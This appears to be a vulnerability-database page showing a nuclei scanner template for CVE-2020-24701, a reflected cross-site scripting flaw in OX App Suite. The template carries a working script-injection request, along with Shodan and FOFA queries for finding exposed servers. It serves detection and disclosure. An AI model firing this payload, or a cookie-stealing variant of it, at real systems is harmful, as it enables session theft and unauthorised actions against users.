Lucene search
K

OX Appsuite - Cross-Site Scripting

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 50 Views

OX Appsuite - Cross-Site Scripting, CVE-2020-24701, allows XSS via app loading mechanis

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
Open-Xchange OX App Suite Cross-Site Scripting Vulnerability
8 Jan 202100:00
cnnvd
CVE
CVE-2020-24701
12 Jan 202107:58
cve
Cvelist
CVE-2020-24701
12 Jan 202107:58
cvelist
NVD
CVE-2020-24701
12 Jan 202108:15
nvd
OSV
CVE-2020-24701
12 Jan 202108:15
osv
Packet Storm
OX App Suite / OX Documents 7.10.x XSS / SSRF
8 Jan 202100:00
packetstorm
Packet Storm
OX App Suite / OX Guard / OX Documents SSRF / Cross Site Scripting
16 Jul 202100:00
packetstorm
Prion
Design/Logic Flaw
12 Jan 202108:15
prion
Positive Technologies
PT-2021-11068 · Open Xchange · Ox App Suite
12 Jan 202100:00
ptsecurity
RedhatCVE
CVE-2020-24701
9 Jan 202609:48
redhatcve
Rows per page
id: CVE-2020-24701

info:
  name: OX Appsuite - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).
  impact: |
    Attackers can inject malicious JavaScript through the PATH_INFO parameter, potentially stealing session cookies or performing unauthorized actions on behalf of users.
  remediation: |
    Upgrade to OX App Suite version 7.10.5 or later.
  reference:
    - https://packetstormsecurity.com/files/163527/OX-App-Suite-OX-Guard-OX-Documents-SSRF-Cross-Site-Scripting.html
    - https://seclists.org/fulldisclosure/2021/Jul/33
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24701
    - https://www.open-xchange.com
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-24701
    cwe-id: CWE-79
    epss-score: 0.06788
    epss-percentile: 0.93204
    cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: open-xchange
    product: open-xchange_appsuite
    shodan-query:
      - html:"Appsuite"
      - http.html:"appsuite"
    fofa-query: body="appsuite"
  tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request with action all'
          - '<script>alert(document.domain);</script>'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fa36c4a45de6905423bf5b1ec86b41d49123c14a8d1a5496a7494863e11de2a4022100984fe85fbeb338cb05f9065273ae853c39d5936004d886207d3182b665cd66e0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.06788
50